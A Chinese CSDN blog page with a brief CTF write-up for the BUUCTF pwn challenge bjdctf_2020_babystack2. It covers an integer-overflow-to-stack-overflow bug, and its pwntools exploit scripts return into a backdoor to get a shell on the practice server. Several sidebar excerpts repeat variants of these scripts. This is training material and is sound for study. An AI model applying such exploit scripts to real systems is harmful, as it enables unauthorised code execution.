bjdctf_2020_babystack2同stack1(整数溢出)

最新推荐文章于 2023-06-21 18:32:57 发布
最新推荐文章于 2023-06-21 18:32:57 发布
阅读量294 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beaster1/article/details/115286958
版权

整数溢出 远程代码执行 ida分析 payload构建 安全漏洞
关键词由CSDN通过智能技术生成

首先检查一下
在这里插入图片描述打开ida看一下
在这里插入图片描述(int)nbytes是signed int类型 后面read 的是unsigned int 类型 这里想到整数溢出 可以传输一个负数使其溢出
下面是我的脚本

from pwn import*
from LibcSearcher import*
p=remote('node3.buuoj.cn','26189')
p.sendline('-121311')#此处可以随意写入一个负数
payload='a'*0x18+p64(0x400726)
p.sendline(payload)
p.interactive()
zeeeroo
关注
专栏目录
通过Stack Overflow线程栈溢出的问题实例,详解C++程序线程栈溢出的诸多细节
dvlinker的技术专栏
08-04 1万+
通过Stack Overflow线程栈溢出的问题实例,详解C++程序线程栈溢出的诸多细节
【C语言】linux内核set_task_stack_end_magic函数
最新发布
数字人生
01-12 1215
二、代码解读 解读1 这段代码是一个在Linux内核中定义的函数,名为set_task_stack_end_magic。其目的是在任务(进程/线程)的栈底设置一个特定的魔数(STACK_END_MAGIC),用来检测栈溢出(栈向下增长,溢出时通常会覆盖这个魔数)。在x86架构中,栈溢出可能会破坏return address,导致安全漏洞如buffer overflow exploits。设置魔数帮助内核开发者发现和调试这类问题。 该函数接收一个参数: - *tsk: 指向`task_struct`的指针
buu bjdctf_2020_babystack2 整数溢出、栈溢出
qq_41849152的博客
09-14 200
整数溢出、栈溢出
bjdctf_2020_babystack2
m0sway的博客
04-04 415
bjdctf_2020_babystack2 WriteUp BUU_PWN
【CTF】bjdctf_2020_babystack2
凉水的博客
06-30 643
bjdctf_2020_babystack2
bjdctf_2020_babystack2【BUUCTF】
qq_41696518的博客
08-31 821
bjdctf_2020_babystack2【BUUCTF】
bjdctf 2020 babystack2
pondzhang的专栏
05-19 247
from pwn import * p = process('./bjdctf_2020_babystack2') p.sendlineafter("length of your name:\n","-1") payload = 24*'a'+ p64(0x0000000000400893) + p64(0) + p64(0x0000000000400726) p.sendlineafter("name?\n",payload) p.interactive()
linux 调试语句BUG_ON WARN_ON dump_stack panic
当我荒废时间的时候,会有多少人在拼命
08-18 3957
一.BUG BUG_ON   作用: 在内核调用可以用来方便标记bug,提供断言并输出信息。最常用的两个是BUG()和BUG_ON()。当被调用的时候,它们会引发oops,导致栈的回溯和错误信息的打印。为什么这些声明会导致 oops跟硬件的体系结构是相关的。大部分体系结构把BUG()和BUG_ON()定义成某种非法操作,这样自然会产生需要的oops。你可以把这些调用当作断言
0ctf2018-babystack_writeup
CabbageWind的博客
08-17 916
题目:0ctf2018-babystack 检查保护机制: 可以看到程序只提供了NX保护。 在IDA中进行反编译,发现一个可读的位置,存在栈溢出漏洞,可能可以利用: 使用peda计算read位置的偏移: 得到read位置距离返回地址的偏移为44,比read的长度0x40小,说明栈溢出漏洞可直接被利用。 查看文件ELF表 通过elf表中查看得知程序中不存在system函数,无法直接跳转;也不存在输出函数,无法打印got表地址。 查看vmmap 通过vmmap可以看到bss段可
[BUUOJ]bjdctf_2020_babystack2
Do1phln的博客
10-25 159
checksec是64位小端序,IDA分析看没找到明显的输入溢出逻辑,但是找到了后门函数,再仔细观察发现数值里面有强制转换,有一部分从int转到了unsigned int,因此可以初步判定为整型溢出,如果我输入-1即可突破长度为10的限制,所以以此下手即可成功修改返回地址,getshell。
【BUUCTF】bjdctf_2020_babystack2
m0_51251108的博客
12-30 336
【BUUCTF】bjdctf_2020_babystack2 64位,无canary 有后门函数 这题思路就是用无符号和有符号整型来绕过10的比较 比如:送入一个-1,无符号类型会把它看成一个很大的正整数,是,而有符号则认为是-1 这题size_t是一种无符号整型,下面被强转成有符号,最后又强转成无符号 所以可以绕过 exp: from pwn import* r=remote('node3.buuoj.cn',29907) context.log_level = 'debug' backdoor=0
[BUUCTF-pwn]——bjdctf_2020_babystack2
Y_peak的博客
02-22 228
[BUUCTF-pwn]——bjdctf_2020_babystack2 题目地址: https://buuoj.cn/challenges#bjdctf_2020_babystack2 先checksec一下 在IDA中查看一下,注意想要栈溢出,首先需要nbytes足够大。size_t类型在标准C语言库中,是unsigned int类型, 64位 long unsigned int。 而%d 是按照int类型读取的,我们读入-1。其实就相当于一个很大的数字,但是可以绕过检查。具体可以了解下整型溢出
BUUCTF(pwn)bjdctf_2020_babystack2
半岛铁盒的博客
04-04 217
这是一道整形溢出的题目 from pwn import * p = remote("node3.buuoj.cn",28786) flag=0x400726 p.sendlineafter("[+]Please input the length of your name:\n",'-1') p.recv() payload='a'*(0x10+8)+p64(flag) p.sendline(payload) p.interactive() 有疑问的欢迎留言 ...
[BUUCTF]PWN——bjdctf_2020_babystack2
BangSen1的博客
04-06 998
bjdctf_2020_babystack2 64位,开启NX保护。 运行一下。 用IDA打开。找到了后门函数。backdoor=0x400726 查看main函数 读入数据的大小由我们输入的参数nbytes控制 nbytes参数的类型 是 size_t,它是一个无符号整型。 但是第7行又将它转换成了有符号的整型,存在整数溢出漏洞(即无符号的数转换成有符号的整型后超过了有符号的整型能表示的范围,从而造成溢出,常用-1来造成溢出) from pwn import * r=remote('nod
bjdctf_2020_babystack【BUUCTF】
qq_41696518的博客
08-26 803
bjdctf_2020_babystack
BUU刷题-Pwn-bjdctf_2020_babystack2
一个啥也不会的小菜鸡!
06-21 168
因此可以输入0x80000001=>2147483649,signed int类型被当做负数小于10,read函数中unsigned int类型被当成正整数2147483649。比较nbytes和10的大小,可以利用无符号整数溢出漏洞,输入一个负数,进而输入name的时候可以实现栈溢出跳转到后门函数getshell。nbytes是signed int类型,4字节,但后面read函数输入name时却是unsigned int类型。
fsl_lin_2.x_stack_package
07-28
fsl_lin_2.x_stack_package是一个软件包,用于Freescale公司(现在的NXP半导体公司)的LIN(局域网互联网络)产品系列。该软件包提供了用于开发LIN网络通信的工具和驱动程序。 LIN是一种用于汽车电子系统中低成本和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值